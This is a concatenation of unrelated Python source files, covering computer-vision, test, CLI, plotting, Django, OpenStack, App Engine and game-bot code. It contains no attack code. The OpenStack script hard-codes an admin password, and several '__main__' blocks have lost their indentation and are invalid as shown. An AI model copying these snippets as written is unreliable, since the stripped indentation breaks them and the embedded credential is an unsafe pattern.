            # if the 'r' key is pressed, reset the cropping region
            if key == ord("r"):
                image = clone.copy()
            # if the 'c' key is pressed, break from the loop
            elif key == ord("c"):
                break
            elif key == ord("s"):
                # cv2.imwrite("saved", image)
                pass
        # close all open windows
        cv2.destroyAllWindows()
        self.interacting = False
if __name__ == "__main__":
img = cv2.img = cv2.imread("images/saved.jpg", 1)
x = User_ROI_Selection(img)
x.user_selection() |
import logging
import os
import pytest
from testing.functional_tests.t_utils import __tmp_dir__, create_tmp_dir, __data_testing_dir__, download_functional_test_files
from testing.common_testing_util import remove_tmp_dir
logger = logging.getLogger(__name__)
def setup_function():
    """Create a fresh temporary working directory before each test."""
    create_tmp_dir()
@pytest.mark.script_launch_mode('subprocess')
def test_automate_training(download_functional_test_files, script_runner):
    """Run ivadomed_automate_training end-to-end and check the result CSVs."""
    file_config = os.path.join(__data_testing_dir__, 'automate_training_config.json')
    file_config_hyper = os.path.join(__data_testing_dir__,
                                     'automate_training_hyperparameter_opt.json')
    __output_dir__ = os.path.join(__tmp_dir__, 'results')
    ret = script_runner.run('ivadomed_automate_training', '--config', f'{file_config}',
                            '--config-hyper', f'{file_config_hyper}',
                            '--path-data', f'{__data_testing_dir__}',
                            '--output_dir', f'{__output_dir__}')
    # Surface the subprocess output in the pytest log for debugging.
    print(f"{ret.stdout}")
    print(f"{ret.stderr}")
    assert ret.success
    # The run must produce all three summary CSVs.
    assert os.path.exists(os.path.join(__output_dir__, 'detailed_results.csv'))
    assert os.path.exists(os.path.join(__output_dir__, 'temporary_results.csv'))
    assert os.path.exists(os.path.join(__output_dir__, 'average_eval.csv'))
@pytest.mark.script_launch_mode('subprocess')
def test_automate_training_run_test(download_functional_test_files, script_runner):
    """Same as test_automate_training but with the --run-test flag."""
    file_config = os.path.join(__data_testing_dir__, 'automate_training_config.json')
    file_config_hyper = os.path.join(__data_testing_dir__,
                                     'automate_training_hyperparameter_opt.json')
    __output_dir__ = os.path.join(__tmp_dir__, 'results')
    ret = script_runner.run('ivadomed_automate_training', '--config', f'{file_config}',
                            '--config-hyper', f'{file_config_hyper}',
                            '--path-data', f'{__data_testing_dir__}',
                            '--output_dir', f'{__output_dir__}',
                            '--run-test')
    # Surface the subprocess output in the pytest log for debugging.
    print(f"{ret.stdout}")
    print(f"{ret.stderr}")
    assert ret.success
    # The run must produce all three summary CSVs.
    assert os.path.exists(os.path.join(__output_dir__, 'detailed_results.csv'))
    assert os.path.exists(os.path.join(__output_dir__, 'temporary_results.csv'))
    assert os.path.exists(os.path.join(__output_dir__, 'average_eval.csv'))
def teardown_function():
    """Remove the temporary working directory after each test."""
    remove_tmp_dir()
|
#!/usr/bin/env python3
# Copyright 2020 Unai Martinez-Corral <unai.martinezcorral@ehu.eus>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
from pathlib import Path
from os import listdir
from sys import exit as sys_exit
from pyAttributes.ArgParseAttributes import (
ArgParseMixin,
ArgumentAttribute,
Attribute,
CommandAttribute,
CommonSwitchArgumentAttribute,
DefaultAttribute,
SwitchArgumentAttribute,
)
from config import Config
from assets import get_json_from_api, extract_from_json, releases_report
from debian import (
check_debian_latest,
get_debs_list,
get_debs,
debian_report,
extract_debs,
)
from fedora import check_fedora_latest
ROOT = Path(__file__).parent.parent
class Tool:
    """Core operations for the dbhi/qus CLI: release and Debian reports."""
    HeadLine = "dbhi/qus CLI tool"
    def __init__(self):
        pass
    def PrintHeadline(self):
        """Print an 80-column banner with the tool headline."""
        print("{line}".format(line="=" * 80))
        print("{headline: ^80s}".format(headline=self.HeadLine))
        print("{line}".format(line="=" * 80))
    @staticmethod
    def assets(fname: Path = ROOT / "releases.json", report: Path = ROOT / "report.md"):
        """Fetch release data from the API and write the releases report."""
        (TARGETS, TABLES) = extract_from_json(get_json_from_api(fname))
        TARGETS.sort()
        releases_report(TARGETS, TABLES, report)
    @staticmethod
    def debian(report: Path = ROOT / "debian.md"):
        """Download Debian packages, extract their targets and write the report."""
        tmpdir = ROOT / "tmp_deb"
        debs = get_debs_list()
        get_debs(debs, tmpdir)
        targets = []
        # extract_debs appends the discovered targets into `targets`.
        extract_debs(targets, debs, tmpdir)
        targets.sort()
        debian_report(targets, debs, report)
class CLI(Tool, ArgParseMixin):
    """Command-line front-end wiring Tool operations to subcommands
    declared via pyAttributes decorators."""
    def __init__(self):
        import argparse
        import textwrap
        # Call constructor of the main inheritance tree
        super().__init__()
        # Call constructor of the ArgParseMixin
        ArgParseMixin.__init__(
            self,
            description=textwrap.dedent(
                "Tool for building (multiarch) images, and for easily browsing publicly available tags and assets."
            ),
            epilog=textwrap.fill("Happy hacking!"),
            formatter_class=argparse.RawDescriptionHelpFormatter,
            add_help=False,
        )
    def Run(self):
        """Parse arguments and dispatch to the matching handler."""
        ArgParseMixin.Run(self)
    @DefaultAttribute()
    def HandleDefault(self, args):
        """No subcommand given: print the banner and the main help page."""
        self.PrintHeadline()
        self.MainParser.print_help()
    @CommandAttribute("help", help="Display help page(s) for the given command name.")
    @ArgumentAttribute(
        metavar="<Command>",
        dest="Command",
        type=str,
        nargs="?",
        help="Print help page(s) for a command.",
    )
    def HandleHelp(self, args):
        """Print help for a specific subcommand, or the main help page."""
        if args.Command == "help":
            print("This is a recursion ...")
            return
        if args.Command is None:
            self.PrintHeadline()
            self.MainParser.print_help()
        else:
            try:
                self.PrintHeadline()
                self.SubParsers[args.Command].print_help()
            except KeyError:
                print("Command {0} is unknown.".format(args.Command))
    @CommandAttribute("check", help="Check if new releases are available upstream (Debian/Fedora).")
    def HandleCheck(self, _):
        """Exit non-zero when a newer Debian or Fedora release exists."""
        ecode = 0
        if check_debian_latest() is not None:
            ecode = 1
        if check_fedora_latest() is not None:
            ecode = 1
        sys_exit(ecode)
    @CommandAttribute("arch", help="Get normalised architecture key/name.")
    @ArgumentAttribute(
        "-u",
        "--usage",
        dest="Usage",
        type=str,
        help="Target usage to get the normalised name for.",
        default=None,
    )
    @ArgumentAttribute(
        "-a",
        "--arch",
        dest="Arch",
        type=str,
        help="Target architecture to get the normalised name for.",
        default="amd64",
    )
    def HandleArch(self, args):
        """Print the normalised name for the given usage/architecture."""
        print(Config().normalise_arch(args.Usage, args.Arch))
    @CommandAttribute("version", help="Get version items for a usage and host (arch).")
    @ArgumentAttribute(
        "-u",
        "--usage",
        dest="Usage",
        type=str,
        help="Target usage to get the version for.",
        default=None,
    )
    @ArgumentAttribute(
        "-a",
        "--arch",
        dest="Arch",
        type=str,
        help="Target architecture to get the version for.",
        default="amd64",
    )
    def HandleVersion(self, args):
        """Print the two version items for the given usage/architecture."""
        items = Config().version(args.Usage, args.Arch)
        print("{0} {1}".format(items[0], items[1]))
    @CommandAttribute("assets", help="Generate report of available releases and assets.")
    def HandleAssets(self, _):
        self.assets()
    @CommandAttribute("debian", help="Generate report of available resources in DEB packages.")
    def HandleDebian(self, _):
        self.debian()
if __name__ == "__main__":
CLI().Run()
|
"""Unit tests for the selected_tests script."""
import json
import os
import unittest
from buildscripts import errorcodes
# Debugging: make errorcodes list the files it scans.
errorcodes.list_files = True
# Fixture directory holding sample sources for each test case.
TESTDATA_DIR = './buildscripts/tests/data/errorcodes/'
class TestErrorcodes(unittest.TestCase):
    """Test errorcodes.py."""
    def setUp(self):
        # errorcodes.py keeps some global state; reset it between tests.
        errorcodes.codes = []
    def test_regex_matching(self):
        """Test regex matching."""
        captured_error_codes = []
        def accumulate_files(code):
            # Callback invoked once per error code found while parsing.
            captured_error_codes.append(code)
        errorcodes.parse_source_files(accumulate_files, TESTDATA_DIR + 'regex_matching/')
        # The fixture directory contains exactly 26 matchable codes.
        self.assertEqual(26, len(captured_error_codes))
    def test_dup_checking(self):
        """Test dup checking."""
        assertions, errors, _ = errorcodes.read_error_codes(TESTDATA_DIR + 'dup_checking/')
        # `assertions` is every use of an error code. Duplicates are included.
        self.assertEqual(4, len(assertions))
        self.assertEqual([1, 2, 3, 2], list(map(lambda x: int(x.code), assertions)))
        # All assertions with the same error code are considered `errors`.
        self.assertEqual(2, len(errors))
        self.assertEqual(2, int(errors[0].code))
        self.assertEqual(2, int(errors[1].code))
    def test_generate_next_code(self):
        """Test `get_next_code`."""
        _, _, seen = errorcodes.read_error_codes(TESTDATA_DIR + 'generate_next_code/')
        generator = errorcodes.get_next_code(seen)
        # Codes are allocated sequentially after the highest seen code.
        self.assertEqual(21, next(generator))
        self.assertEqual(22, next(generator))
    def test_generate_next_server_code(self):
        """ This call to `read_error_codes` technically has no bearing on `get_next_code` when a
        `server_ticket` is passed in. But it maybe makes sense for the test to do so in case a
        future patch changes that relationship."""
        _, _, seen = errorcodes.read_error_codes(TESTDATA_DIR + 'generate_next_server_code/')
        print("Seen: " + str(seen))
        generator = errorcodes.get_next_code(seen, server_ticket=12301)
        # Ticket-scoped codes are <ticket><2-digit seq>; 1230102 is taken.
        self.assertEqual(1230101, next(generator))
        self.assertEqual(1230103, next(generator))
    def test_ticket_coersion(self):
        """Test `coerce_to_number`."""
        self.assertEqual(0, errorcodes.coerce_to_number(0))
        self.assertEqual(1234, errorcodes.coerce_to_number('1234'))
        self.assertEqual(1234, errorcodes.coerce_to_number('server-1234'))
        self.assertEqual(1234, errorcodes.coerce_to_number('SERVER-1234'))
        # Unparseable tickets coerce to -1.
        self.assertEqual(-1, errorcodes.coerce_to_number('not a ticket'))
|
#encoding:utf-8
import word_util
import codecs
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import random
def word_idf_equal_zero(word_idf_map):
    """Count words whose idf is (effectively) zero.

    Returns (count, proportion) over all words in word_idf_map; a value
    below 1e-6 is treated as zero.
    """
    zero_flags = [float(word_idf_map[word]) < 1e-6 for word in word_idf_map]
    zero_count = np.sum(zero_flags)
    return zero_count, zero_count / np.size(zero_flags)
def plot_hist_word_idf(x):
    """Display a histogram of the idf values in x.

    Blocks until the plot window is closed (plt.show).
    """
    # plt.subplots returns a (figure, axes) tuple; the original bound the
    # whole tuple to a variable named `fig` — unpack it properly.
    fig, ax = plt.subplots(1, 1, figsize=(8, 4))
    plt.hist(x)
    plt.show()
if __name__ == "__main__":
word_idf_file = "../out/global_idf.txt"
word_idf_map = word_util.build_word_idf_hashmap(word_idf_file)
count_idf_0,proportion_idf_0 = word_idf_equal_zero(word_idf_map)
print(count_idf_0, proportion_idf_0)
list_idf = list(map(lambda x:float(word_idf_map[x]),word_idf_map))
#print(list_idf)
plot_hist_word_idf(list_idf)
|
from SloppyCell.ReactionNetworks import *
# Load BioModels model 51 and integrate it over 0..40 time units.
net = IO.from_SBML_file('BIOMD0000000051.xml', 'base')
net.compile()
traj = Dynamics.integrate(net, [0, 40])
# Figure 1: 3x3 grid of metabolite time courses; one shared y-range per row.
Plotting.figure(1, figsize=(8,8))
Plotting.clf()
# NOTE: `vars` shadows the builtin of the same name (script-local only).
vars = ['cglcex','cfdp','cg1p','cg6p','cpep','cpyr','cf6p','cgap','cpg']
for ii, v in enumerate(vars):
    ax = Plotting.subplot(3,3, ii + 1)
    Plotting.plot_trajectory(traj, [v])
    # Only the bottom row keeps x tick labels.
    if ax.is_last_row():
        Plotting.xticks([0, 10, 20, 30])
    else:
        Plotting.xticks([])
    # Row-specific y-range (ii//3 is the row index).
    if ii//3 == 0:
        Plotting.axis([0, 40, 0, 3.4])
    elif ii//3 == 1:
        Plotting.axis([0, 40, 0, 6.75])
    elif ii//3 == 2:
        Plotting.axis([0, 40, 0, 1.4])
    # Only the first column keeps y tick labels.
    if not ax.is_first_col():
        Plotting.yticks([])
Plotting.subplots_adjust(wspace=0, hspace=0)
# Figure 2: zoom on early dynamics (t in [0, 1]) for four metabolites.
Plotting.figure(2, figsize=(6,10))
Plotting.clf()
vars = ['cg6p', 'cf6p', 'cpep', 'cpyr']
for ii, v in enumerate(vars):
    ax = Plotting.subplot(4,1, ii + 1)
    Plotting.plot_trajectory(traj, [v])
    if not ax.is_last_row():
        Plotting.xticks([])
    # Per-panel axis ranges.
    if ii == 0:
        Plotting.axis([0, 1, 3, 6])
    elif ii == 1:
        Plotting.axis([0, 1, 0.4, 0.9])
    elif ii == 2:
        Plotting.axis([0, 1, 1.5, 3.25])
    elif ii == 3:
        Plotting.axis([0, 1, 2.5, 4.25])
Plotting.subplots_adjust(wspace=0, hspace=0)
# Figure 3: cofactor groups plotted together per panel.
Plotting.figure(3, figsize=(6,10))
Plotting.clf()
vars = [('catp', 'cadp', 'camp'), ('cnad', 'cnadh'), ('cnadp', 'cnadph')]
for ii, v in enumerate(vars):
    ax = Plotting.subplot(3,1, ii + 1)
    Plotting.plot_trajectory(traj, v)
    if not ax.is_last_row():
        Plotting.xticks([])
    if ii == 0:
        Plotting.axis([0, 40, 0, 5])
    elif ii == 1:
        Plotting.axis([0, 40, 0, 2.0])
    elif ii == 2:
        Plotting.axis([0, 40, 0.04, 0.24])
Plotting.subplots_adjust(wspace=0, hspace=0)
|
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
import datetime
from personnel.models import Person, JobPosting, Organization
from lab_website.tests import BasicTests
MODELS = [Person, JobPosting]
class PersonnelModelTests(BasicTests):
    """Tests the model attributes of ::class:`Personnel` objects contained in the ::mod:`personnel` app."""
    fixtures = ['test_personnel']
    def test_full_name(self):
        '''This is a test for the rendering of the full name from a ::class:`Person` object.'''
        fixture_personnel = Person.objects.get(first_name='John', last_name='Doe')
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual throughout.
        self.assertEqual(fixture_personnel.full_name(), 'John Doe')
    def test_name_slug(self):
        '''This is a test for the rendering of the name_slug field from a ::class:`Person` object.'''
        fixture_personnel = Person.objects.get(first_name='John', last_name='Doe')
        self.assertEqual(fixture_personnel.name_slug, 'john-doe')
    def test_personnel_permalink(self):
        '''This is a test that the permalink for a ::class:`Person` object is correctly rendered as **/people/<name_slug>**'''
        fixture_personnel = Person.objects.get(first_name='John', last_name='Doe')
        self.assertEqual(fixture_personnel.get_absolute_url(), '/people/john-doe/')
    def test_create_labmember_minimal(self):
        '''This is a test for creating a new ::class:`Person` object, with only the minimum fields being entered'''
        test_labmember = Person(first_name = 'Joe',
                                last_name = 'Blow', alumni=False, current_lab_member=True)
        test_labmember.save()
        #test that the slugify function works correctly
        self.assertEqual(test_labmember.name_slug, u'joe-blow')
class PersonnelViewTests(BasicTests):
    """Tests the views of ::class:`Personnel` objects contained in the ::mod:`personnel` app."""
    fixtures = ['test_personnel']
    def test_laboratory_personnel(self):
        '''This function tests the laboratory-personnel view.'''
        test_response = self.client.get('/people/')
        self.assertEqual(test_response.status_code, 200)
        self.assertTrue('personnel' in test_response.context)
        self.assertTemplateUsed(test_response, 'personnel_list.html')
        # The default listing shows current lab members only.
        self.assertEqual(test_response.context['personnel_type'], 'current')
        self.assertEqual(test_response.context['personnel'][0].pk, 1)
        self.assertEqual(test_response.context['personnel'][0].first_name, 'John')
        self.assertEqual(test_response.context['personnel'][0].last_name, 'Doe')
    def test_personnel_detail(self):
        '''This function tests the personnel-details view.'''
        test_response = self.client.get('/people/john-doe/')
        self.assertEqual(test_response.status_code, 200)
        self.assertTrue('person' in test_response.context)
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTemplateUsed(test_response, 'personnel_detail.html')
        self.assertEqual(test_response.context['person'].pk, 1)
        self.assertEqual(test_response.context['person'].first_name, 'John')
        self.assertEqual(test_response.context['person'].last_name, 'Doe')
class JobPostingModelTests(BasicTests):
    """Tests the model attributes of ::class:`JobPosting` objects contained in the ::mod:`personnel` app."""
    fixtures = ['test_organization',]
    def test_create_jobposting_minimal(self):
        '''This is a test for creating a new ::class:`JobPosting` object, with only the minimum fields being entered'''
        test_jobposting = JobPosting(title = 'Postdoctoral Researcher',
                                     description = 'Some description',
                                     link = 'http:/jobs.com/awesomejob',
                                     active=True)
        test_jobposting.save()
        self.assertEqual(test_jobposting.pk, 1)
    def test_create_jobposting_all(self):
        '''This is a test for creating a new ::class:`JobPosting` object, with all fields being entered'''
        test_jobposting = JobPosting(title = 'Postdoctoral Researcher',
                                     description = 'Some description',
                                     link = 'http:/jobs.com/awesomejob',
                                     hiringOrganization = Organization.objects.get(pk=1),
                                     education = "An educational requirement",
                                     qualifications = "Some qualifications",
                                     responsibilities = "Some responsibilities",
                                     active = True)
        test_jobposting.save()
        self.assertEqual(test_jobposting.pk, 1)
    def test_jobposting_unicode(self):
        '''This test creates a new :class:`~personnel.models.JobPosting` object, then tests for the unicode representation of it.'''
        # NOTE(review): __unicode__ is the Python 2 string hook; under
        # Python 3 Django this should be __str__ — confirm runtime version.
        test_jobposting = JobPosting(title = 'Postdoctoral Researcher',
                                     description = 'Some description',
                                     link = 'http:/jobs.com/awesomejob',
                                     active=True)
        test_jobposting.save()
        self.assertEqual(test_jobposting.__unicode__(), 'Postdoctoral Researcher Job Posting (%s)' %(datetime.date.today()) )
|
# Import the OpenStack connection class from the SDK
from openstack import connection

# Create a connection object by calling the constructor and pass the security information
# NOTE(review): credentials and the endpoint are hard-coded for a local devstack;
# move them to environment variables or clouds.yaml before sharing/deploying.
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
                             project_name="demo",
                             username="admin",
                             password="manoj",
                             user_domain_id="default",
                             project_domain_id="default")
def assign_security_group_to_vm(conn,
                                server_id="613bf835-5eb7-4a4b-ae9c-e0f6f6665f2b",
                                security_group_id="d2e47c84-1d31-4008-8192-29cc207338b9"):
    """Attach a security group to a server (VM).

    The IDs were previously hard-coded; they are now parameters with the old
    values as defaults, so existing callers keep working.

    Args:
        conn: An authenticated ``openstack.connection.Connection``.
        server_id: ID of the target server (defaults to the original demo VM).
        security_group_id: ID of the security group to attach.
    """
    conn.compute.add_security_group_to_server(server_id, security_group_id)
def remove_security_group_from_vm(conn,
                                  server_id="613bf835-5eb7-4a4b-ae9c-e0f6f6665f2b",
                                  security_group_id="d2e47c84-1d31-4008-8192-29cc207338b9"):
    """Detach a security group from a server (VM).

    The IDs were previously hard-coded; they are now parameters with the old
    values as defaults, so existing callers keep working.

    Args:
        conn: An authenticated ``openstack.connection.Connection``.
        server_id: ID of the target server (defaults to the original demo VM).
        security_group_id: ID of the security group to detach.
    """
    conn.compute.remove_security_group_from_server(server_id, security_group_id)
def security_groups(conn):
    """Print every security group visible through the network endpoint."""
    for group in conn.network.security_groups():
        print(group)
# Only the read-only listing is enabled; uncomment a line below to modify the VM.
#assign_security_group_to_vm(conn)
#remove_security_group_from_vm(conn)
security_groups(conn)
|
from osr2mp4.ImageProcess import imageproc
from osr2mp4.ImageProcess.PrepareFrames.YImage import YImage
# Skin element name of the unstable-rate arrow sprite.
urarrow = "editor-rate-arrow"


def prepare_urarrow(settings):
    """Load the unstable-rate arrow image, scaled for the score meter and faded to 85% alpha."""
    size = settings.scale * settings.settings["Score meter size"] * 0.75
    arrow = YImage(urarrow, settings, size, defaultpath=True).img
    imageproc.changealpha(arrow, 0.85)
    return [arrow]
|
"""Resources management (files/directories/etc.)."""
__version__ = '0.1.3'
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Compares page data sent from the client.
This file contains handlers that are used to run data comparisons.
"""
import math
from django.utils import simplejson
from google.appengine.api import taskqueue
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from models import data_list
from models import page_data
from models import page_delta
from models import screenshot
# URL routes served by this module (wired up in the WSGIApplication below).
COMPUTE_DELTA_URL = '/compute_delta'
COMPUTE_DELTA_BY_PART_URL = '/compute_delta_by_part'
COMPUTE_SCORE_URL = '/compute_score'
class ComputeDeltaHandler(webapp.RequestHandler):
    """Handler for computing a page delta."""

    # Disable 'Invalid method name' lint error.
    # pylint: disable-msg=C6409
    def get(self):
        """Compares a page delta based on the given delta key."""
        delta_key = self.request.get('delta')
        if delta_key:
            # Explicit key supplied: compute that specific delta.
            delta = db.get(db.Key(delta_key))
        else:
            # No key given: look for an uncompared test/reference pair.
            delta = self.FindPairToCompare()
        if delta:
            self.AddCompareTasksToQueue(delta)
        else:
            self.response.out.write('No data to compare.')

    def FindPairToCompare(self):
        """Finds a pair of data to compare if exists.

        If it finds a pair of data, it will mark entry from the test browser as
        already compared (in a transaction) and then create and save a new delta
        entry and return it.

        Returns:
            The delta entry if there's a pair to compare. None otherwise.
        """
        uncompared_test_data = page_data.PageData.all().filter(
            'is_reference =', False).filter('compared =', False)
        for test_data in uncompared_test_data:
            if not test_data.IsReady():
                continue
            try:
                suite = test_data.test_suite
            except db.Error:
                # Dangling test-suite reference; skip this entry.
                continue
            # Reference entry for the same suite and site, if one exists.
            ref_data = page_data.PageData.all().filter(
                'test_suite =', suite).filter(
                    'site =', test_data.site).filter(
                        'is_reference =', True).get()
            if ref_data:
                test_data_key = str(test_data.key())

                # Function to run in a transaction. Returns True if the data is good
                # to be compared; returns False if it has already been marked as
                # compared by some other requests.
                def MarkDataAsCompared():
                    # Re-fetch and double check if the data hasn't been compared to avoid
                    # concurrency problems.
                    data = db.get(db.Key(test_data_key))
                    if not data.compared:
                        # NOTE(review): the freshly fetched `data` is only used for the
                        # check; the outer (possibly stale) `test_data` is what is
                        # mutated and put -- confirm this is intentional.
                        test_data.compared = True
                        test_data.put()
                        return True
                    else:
                        return False

                if db.run_in_transaction(MarkDataAsCompared):
                    # We won the race: build and persist the new delta entry.
                    delta = page_delta.PageDelta()
                    delta.test_data = test_data
                    delta.ref_data = ref_data
                    delta.test_browser = test_data.browser
                    delta.test_browser_channel = test_data.browser.channel
                    delta.ref_browser = ref_data.browser
                    delta.ref_browser_channel = ref_data.browser.channel
                    if test_data.metadata:
                        delta.test_data_metadata = test_data.metadata
                    if ref_data.metadata:
                        delta.ref_data_metadata = ref_data.metadata
                    delta.test_suite = test_data.test_suite
                    delta.compare_key = page_delta.GetOrInsertUniqueKey(
                        delta.GetTestBrowser().key().name(),
                        delta.GetRefBrowser().key().name(), delta.GetSiteUrl())
                    delta.delta = data_list.CreateEmptyDataList()
                    delta.dynamic_content = data_list.CreateEmptyDataList()
                    # This is hack to work around screenshot blobstore missing issue.
                    self.SetScreenshotKeyUsingPageDataRef(test_data)
                    self.SetScreenshotKeyUsingPageDataRef(ref_data)
                    delta.put()
                    return delta
        return None

    def AddCompareTasksToQueue(self, delta):
        """Adds a task to the task queue to compute the given delta.

        Each task computes one part of the layout.

        Args:
            delta: A PageDelta object to add to the task queue.
        """
        delta_key = str(delta.key())
        task_url = '/compute_delta_by_part'
        for i in range(data_list.NUM_ENTRIES):
            task_params = {'deltaKey': delta_key,
                           'part': i}
            taskqueue.add(url=task_url, params=task_params, method='GET')
        self.response.out.write('Tasks added. key=%s' % delta_key)

    def SetScreenshotKeyUsingPageDataRef(self, pd):
        """Adds a screenshot blobstore key to page data model(if missing).

        This is a hack for screenshot key missing issue for page_data model.

        Args:
            pd: A PageData object to check if screenshot is missing.
        """
        if not pd.screenshot:
            pd_screenshot = screenshot.Screenshot.all(keys_only=True).filter(
                'pagedata_ref =', str(pd.key())).get()
            if pd_screenshot:
                pd.screenshot = pd_screenshot
                pd.put()
class ComputeDeltaByPart(webapp.RequestHandler):
    """Handler for computing a page delta based on part of the page."""

    # Disable 'Invalid method name' lint error.
    # pylint: disable-msg=C6409
    def get(self):
        """Compares a page delta by part based on the given delta key and part."""
        delta_key = self.request.get('deltaKey')
        part = int(self.request.get('part'))
        delta = db.get(db.Key(delta_key))
        if delta.test_data.layout_table:
            dl = []              # differing cells: (x, y, test_node_id, ref_node_id)
            ignoredContent = []  # cells skipped because they are dynamic content
            nt1 = delta.test_data.GetNodesTable()
            nt2 = delta.ref_data.GetNodesTable()
            # Let's initialize dynamicContentTable.
            dynamic_content_table_test = None
            dynamic_content_table_ref = None
            if delta.test_data.dynamic_content_table:
                dynamic_content_table_test = simplejson.loads(
                    delta.test_data.dynamic_content_table)
            if delta.ref_data.dynamic_content_table:
                dynamic_content_table_ref = simplejson.loads(
                    delta.ref_data.dynamic_content_table)
            rows1 = delta.test_data.layout_table.GetEntryData(part)
            rows2 = delta.ref_data.layout_table.GetEntryData(part)
            # Number of rows covered by each part of the layout table.
            part_length = int(math.ceil(delta.test_data.height /
                                        float(data_list.NUM_ENTRIES)))
            # Walk the overlapping region of both layout tables cell by cell.
            for i in range(min(len(rows1), len(rows2))):
                for j in range(min(len(rows1[i]), len(rows2[i]))):
                    try:
                        nid1 = int(rows1[i][j])
                        nid2 = int(rows2[i][j])
                    except ValueError:
                        # A cell may carry extra tokens; the node id is the first one.
                        nid1 = int(rows1[i][j].split()[0])
                        nid2 = int(rows2[i][j].split()[0])
                    if nid1 < 0 or nid2 < 0:
                        continue
                    # If element is marked as dynamic content then add it to
                    # ignoredContent and continue.
                    if ((dynamic_content_table_test and
                         (nid1 in dynamic_content_table_test)) or
                        (dynamic_content_table_ref and
                         (nid2 in dynamic_content_table_ref))):
                        x = j
                        y = i + part * part_length
                        ignoredContent.append((x, y, nid1, nid2))
                        continue
                    try:
                        node1 = nt1[nid1]
                        node2 = nt2[nid2]
                    except IndexError:
                        continue
                    if not AreNodesSame(node1, node2):
                        x = j
                        y = i + part * part_length
                        dl.append((x, y, nid1, nid2))
            delta.delta.AddEntry(part, dl)
            delta.dynamic_content.AddEntry(part, ignoredContent, True)
        if delta.delta.EntriesReady():
            # All parts are done: enqueue the scoring task.
            task_params = {'deltaKey': delta_key}
            taskqueue.add(url='/compute_score', params=task_params, method='GET')
        else:
            self.response.out.write('Tasks %d finished.' % part)
class ComputeScore(webapp.RequestHandler):
    """Computes the score of a given delta after all parts are finished.

    Also deletes the layout table of the original test data entry to save space.
    Handler also calculates various element count and create indices necessary.
    """

    # Disable 'Invalid method name' lint error.
    # pylint: disable-msg=C6409
    def get(self):
        # Compute the score for the delta identified by ?deltaKey=...
        key = self.request.get('deltaKey')
        result = db.get(db.Key(key))
        # NOTE(review): a negative score appears to mean "not yet computed",
        # making this handler idempotent -- confirm against PageDelta.
        if result.score < 0:
            result.ComputeScore()
            result.test_data.DeleteLayoutTable()
            result.CreateIndices()
            result.CalculateElemCount()
        self.response.out.write('Done.')
def AreNodesSame(node_data_1, node_data_2):
    """Compares if two nodes are the same.

    Currently using a very basic algorithm: assume the nodes are the same if
    either their XPaths are the same or their dimension/positions are the same.

    Args:
        node_data_1: A dictionary of values about a DOM node.
        node_data_2: A dictionary of values about a DOM node.

    Returns:
        A boolean indicating whether the two nodes should be considered equivalent.
    """
    # Matching XPaths (case-insensitive) are sufficient on their own.
    if node_data_1['p'].lower() == node_data_2['p'].lower():
        return True
    # Otherwise require identical width, height and position.
    return all(node_data_1[field] == node_data_2[field]
               for field in ('w', 'h', 'x', 'y'))
# Route table wiring each URL constant to its handler class.
application = webapp.WSGIApplication(
    [(COMPUTE_DELTA_URL, ComputeDeltaHandler),
     (COMPUTE_DELTA_BY_PART_URL, ComputeDeltaByPart),
     (COMPUTE_SCORE_URL, ComputeScore)],
    debug=True)
def main():
    """Entry point: serve the comparison WSGI application."""
    run_wsgi_app(application)


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
import commands
import thread
import signal
import os
import time
import subprocess
import platform
import sys
import traceback
import glob
if platform.system() == "Windows":
import win32api
from tasbot.utilities import *
from tasbot.plugin import IPlugin
import udpinterface
def addorreplace(scripttxt, key, value):
    """Set `key=value;` in a Spring start-script section.

    If a `key=` entry already exists its whole `key=...;` span is rewritten in
    place; otherwise a new tab-indented line is inserted right after the first
    opening '{' (or at the start of the text when there is no '{').

    Fixes over the previous version:
      * a search for e.g. "HostPort" no longer matches inside a longer key
        such as "AutoHostPort=...;" (suffix matches are skipped);
      * the replacement is spliced by index instead of str.replace, so an
        identical earlier substring can never be replaced by mistake;
      * an unterminated entry (no ';') is rewritten through end-of-text
        instead of corrupting the script.

    Args:
        scripttxt: the start-script text.
        key: tag name to set.
        value: value to assign (formatted with %s).

    Returns:
        The updated script text.
    """
    target = key + "="
    s1 = scripttxt.find(target)
    # Skip matches where `key=` is only the tail of a longer key name.
    while s1 > 0 and (scripttxt[s1 - 1].isalnum() or scripttxt[s1 - 1] == "_"):
        s1 = scripttxt.find(target, s1 + 1)
    if s1 >= 0:  # replace existing entry
        semi = scripttxt.find(";", s1)
        s2 = semi + 1 if semi >= 0 else len(scripttxt)
        return scripttxt[:s1] + "%s=%s;" % (key, value) + scripttxt[s2:]
    # add new entry at top of file
    index = scripttxt.find('{') + 1
    return scripttxt[:index] + "\n\t%s=%s;\n" % (key, value) + scripttxt[index:]
class Main(IPlugin):
    """Relayhost/autohost plugin: opens a Spring battle on behalf of a remote
    owner, relays owner commands between the lobby server and the game, and
    manages the spring-dedicated process lifecycle."""

    def __init__(self,name,tasclient):
        IPlugin.__init__(self,name,tasclient)
        self.sock = self.tasclient.socket
        self.app = None              # main application, set in onload()
        self.hosted = 0              # 1 once the battle owner joined our battle
        self.battleowner = ""
        self.battleid = 0
        self.status = 0
        self.pr = 0                  # spring-dedicated subprocess (Popen) handle
